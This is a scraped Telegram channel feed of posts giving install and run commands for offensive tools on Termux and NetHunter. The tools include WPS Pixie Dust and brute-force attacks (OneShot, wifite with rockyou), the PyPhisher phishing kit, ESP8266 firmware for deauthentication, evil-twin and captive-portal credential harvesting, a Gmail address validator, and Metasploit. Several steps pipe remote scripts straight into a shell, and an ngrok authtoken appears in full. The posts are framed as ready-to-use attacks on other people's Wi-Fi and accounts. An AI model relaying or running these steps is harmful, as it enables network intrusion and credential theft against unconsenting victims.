Termux
2.2K subscribers
670 photos
83 videos
407 files
739 links
Termux-Collection
Download Telegram
Forwarded from Cyryx college
Media is too big
VIEW IN TELEGRAM
¶¶Install ngrok on termux
Open chrome

¶¶Go to
https://dashboard.ngrok.com/signup
Signup with a new gmail
aftee that go to termux and copy past this

📍wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-arm64.tgz
¶¶ when download is completed

( to extract it type )
📍tar vxzf ngrok-v3-stable-linux-arm64.tgz

¶¶Now go back to chrome ngrok page and lets add our ngrok token copy it full

Example = ngrok config add-authtoken 55NulkHPoB9SsymNPp6U1ewIX2m_3bZakfrsceXpQR1gkay4L
( add ./ after that full link )
¶¶Go back to termux and past i with ./
📍./ngrok config add-authtoken 55NulkHPoB9SsymNPp6U1ewIX2m_3bZakfrsceXpQR1gkay4L

(Open Hotspot in your phone ) before using
👍1
¶¶ Seema
#wordlist
a random password generator tool which generates a random password of your choice. If you wants easy password, then it will generate a random easy password and give you and ask from you whether you wants to save or not. If you doesn't want to save your password and it will stop processing but if you wants to save your password then, it will ask from you a name for your password.

📍apt-get update && apt-get upgrade -y
📍apt-get install python git -y
📍git clone https://github.com/adarshaddee/Seema.git
📍cd Seema
📍chmod +x setup.sh
📍./setup.sh

OR YOU CAN USE

📍pip install -r requirements.txt
📍python Seema.py

------------------------------------------------


Random-Password-Generator

Program written by Python Language

Requirements

apt update && apt upgrade pkg install python pip install requests

Run

cd Random-Password-Generator python gen_rand_passwd.py
This media is not supported in your browser
VIEW IN TELEGRAM
WPS PIN attacks Pixie Dust, online bruteforce, without monitor mode with the wpa_supplicant

Using installer
curl -sSf https://raw.githubusercontent.com/drygdryg/OneShot_Termux_installer/master/installer.sh | bash

¶¶ Manually Installing requirements
📍pkg install -y root-repo
📍pkg install -y git tsu python
📍wpa-supplicant pixiewps iw


¶¶ Getting OneShot

📍git clone --depth 1 https://github.com/drygdryg/OneShot OneShot


¶¶ Running
📍sudo python OneShot/oneshot.py -i wlan0 --iface-down -K

¶¶ Start Pixie Dust attack on a specified BSSID:
📍sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -K

¶¶ Show avaliable networks and start
📍sudo python3 oneshot.py -i wlan0 -K

¶¶ Launch online WPS bruteforce
📍sudo python3 oneshot.py -i wlan0 -b 00:90:4C:C1:AC:21 -B -p 1234


¶¶ Start WPS push button connection:s

📍sudo python3 oneshot.py -i wlan0 --pbc

¶¶ Troubleshooting check this link below and give it a try it .tested on samsung note10 plus / and as u can see it works for me

📍https://github.com/drygdryg/OneShot
👍1
¶¶ wpspin

WPS PIN generator uses known MAC address based algorithms commonly found in routers firmware to generate their default PINs. The PIN can be used with programs like Reaver, Bully or OneShot to recover Wi-Fi password.

Installation
📍pip install wpspin
Or you can install from source with:

📍git clone https://github.com/drygdryg/wpspin.git
📍cd wpspin/
📍python setup.py install

Example:

📍$ wpspin 54:A0:50:75:D2:40
1
Media is too big
VIEW IN TELEGRAM
¶¶ PyPhisher /65Tools
#phishing #socialmedia #kalinethunter #termux

Ultimate phishing tool in python. Includes popular websites like facebook, twitter, instagram, github, reddit, gmail and many others

git clone https://github.com/KasRoudra/PyPhisher
cd PyPhisher
python3 pyphisher.py

¶¶ Or, directly run

wget https://raw.githubusercontent.com/KasRoudra/PyPhisher/main/pyphisher.py && python3 pyphisher.py
¶¶ Golismero
Web Application Vulnerability Scanner




sudo bash
apt-get install python2.7 python2.7-dev python-pip python-docutils git perl nmap sslscan cd /opt
git clone https://github.com/golismero/golismero.git
cd golismero
pip install -r requirements.txt pip install -r requirements_unix.txt
ln -s /opt/golismero/golismero.py /usr/bin/golismero

exit
1👍1
¶¶ JFScan lets you utilize Masscan to scan for open ports and use Nmap scripts on discovered ports to scan for services. JFScan allows you to run a scan of many different targets using the targets flag(-t) followed by a text file with the domain/IP/URL listed inside.

📍sudo apt install libpcap-dev git clone https://github.com/robertdavidgraham/masscan
📍cd masscan
📍make
📍sudo make install
📍sudo setcap CAP_NET_RAW+ep /usr/bin/masscan

¶¶ to install JFScan back in your home directory
📍cd ~
📍git clone https://github.com/nullt3r/jfscan.git $ 📍cd jfscan
📍pip3 install .


usage:
jfscan [-h] -t TARGETS [--resolvers RESOLVERS] [-m MODULES] (-p PORTS | -tp TOP_PORTS) [-r MAX_RATE] [-oi] [-od] [-q] [--nmap] [--nmap-options NMAP_OPTIONS] [--nmap-threads NMAP_THREADS] [--nmap-output NMAP_OUTPUT]
¶¶ sherlock
#sherlock #socialmedia #info #nethunter #termux

📍git clone https://github.com/sherlock-project/sherlock.git

📍cd sherlock
📍python3 -m pip install -r requirements.txt
📍python3 sherlock --help

¶¶ To search for only one user:
📍python3 sherlock user123

¶¶ To search for more than one user:
📍python3 sherlock user1 user2 user3
¶¶ This package contains the rockyou.txt wordlist and has an installation size of 134 MB.
#wordlist #rockyou #fern
📍sudo apt install wordlists
📍wordlists -h
> wordlists ~ Contains the rockyou wordlist /usr/share/wordlists
|--dirb |--dirbuster
|--dnsmap.txt
|--fasttrack.txt
|--fern-wifi
|--metasploit
|--nmap.lst
|--rockyou.txt.gz
|--seclists
|--wfuzz
#wifite /
to make it easy and fast

📍sudo wifite -i wlan0 --ignore-locks --keep-ivs -p 1337 -mac --random-mac -v -inf --bully --pmkid --dic /usr/share/wordlists/rockyou.txt --require-fakeauth --nodeauth --wps --pmkid-timeout 120
👍1
wifite.txt
4.4 KB
#wifite / all commands v3
#pyrit erro fix
#wifte

¶¶ If you run into any problems installing Pyrit. You may need to install the following packages and reinstall.

📍apt install python2 build-essential python2-dev libpcap-dev libssl-dev


installation:-

📍git clone https://github.com/JPaulMora/Pyrit.git;cd Pyrit

📍python2 setup.py clean;sudo python2 setup.py build;sudo python2 setup.py install
Deleted Account
Nethunter permission error fix Download the file (nethunter.sh) Open terminal AndroidSu type su sd sdcard or /sdcard sh nethunter.sh when you see done (restart device your nethunter will work got this error on latest version and fixed on samsung note 10…
¶¶ put this on androidsu
copy & past in androidsu

pm grant com.offsec.nethunter android.permission.ACCESS_FINE_LOCATION

pm grant com.offsec.nethunter android.permission.ACCESS_COARSE_LOCATION

pm grant com.offsec.nethunter android.permission.READ_EXTERNAL_STORAGE


pm grant com.offsec.nethunter android.permission.WRITE_EXTERNAL_STORAGE

pm grant com.offsec.nethunter com.offsec.nhterm.permission.RUN_SCRIPT

pm grant com.offsec.nethunter com.offsec.nhterm.permission.RUN_SCRIPT_SU

pm grant com.offsec.nethunter com.offsec.nhterm.permission.RUN_SCRIPT_NH

pm grant com.offsec.nethunter com.offsec.nhterm.permission.RUN_SCRIPT_NH_LOGIN
👍2
ESP8266-Fluxion.ino.nodemcu.bin
256 KB
¶¶ Fluxion-on-esp8266
This is a Advance Fluxion tool on esp8266...
#esp8266

¶¶ Connect to the AP named "M1z23R" with password:- "deauther" from your phone/PC.
¶¶ in chrome browser open 192.168.4.1
¶¶ You will see list of target (nearby )
¶¶ select your target
¶¶ click on deauthing
¶¶ after that click on evil twin attack
¶¶ check wifi .You will see open network with victim ssid .when victims enter correct password it will close and change to "M1z23R" again open in chrome browser 192.168.4.1 below will be the password

¶¶ Readme: https://github.com/pitube08642/Fluxion-on-ESP8266

¶¶ android app ( if you get error move on to pc )

¶¶ Android application
https://play.google.com/store/apps/details?id=com.bluino.esploader
ESP_Code.ino.generic.bin
340.2 KB
¶¶ esp8266

ESPortalV2 is a WiFi Captive Portal Credential Harvester (Phisher) for ESP8266 Devices. Fake a "Free WiFi HotSpot" with spoofed login pages.

¶¶ SSID: "Free WiFi"
URL: http://192.168.1.1/esportal

¶¶ username "admin"
password "hacktheplanet"

¶¶ Readme : https://github.com/exploitagency/ESPortalV2
espbug.bin
499.5 KB
¶¶ esp
#cafey


ESPBug is a rogue captive portal program which runs on the ESP8266 dev board, such as the NodeMCU (clones included). It is a social engennering tool which generates a WiFi network of a given name alluring people to connect to it and enter some credentials.

When you connect to the ESPBug, go to any domain name and to the espportal page (e.g. http://espbug.com/espportal) You should be shown a pop up window asking you for the password. Defaults are Username: espbug and Password: password. From there you are redirected to the home page.

¶¶ Readme : https://www.youtube.com/watch?v=X95rtPqSzw4
This media is not supported in your browser
VIEW IN TELEGRAM
¶¶ gmailify
This tool validates if gmail addresses and corporate emails with google mail servers are valid without being authenticated. The default thread is 10 to avoid being rate limited.
#gmail #wordlist #gmailvalidchecker
#termux
¶¶ Installation
python -m pip install gmailify

¶¶Check a single gmail address
python -m gmailify -e example@gmail.com

¶¶ Input from file
python -m gmailify -f emails.txt

¶¶Pass through proxy
python -m gmailify -p
1
Forwarded from Rose
Install Metasploit in Termux Latest Update (6.1.42). Dated on 06/05/2022

Metasploit Without Error in termux?

First and Final Step: Run The script

source <(curl -fsSl https://raw.githubusercontent.com/efxtv/Metasploit-in-termux/main/metasploit-6-termux.sh)

Note: At the end script will ask you to open a new terminal and test your tool. Press y/n accordingly.

(At the end of the installation, there will be a bash prompt, which will prompt you to open a new terminal in termux and try to run msfconsole (to check if metasploit is working) if that works, then get back to previous terminal (prompt) and press y else (dont work or error after msfconsole) press n , once you press n, termux will automatically look for errors and fix that for you)... demo 👇👇👇

Source here
Visit out blog: Uk2blogger
👉 Video here (must like and share)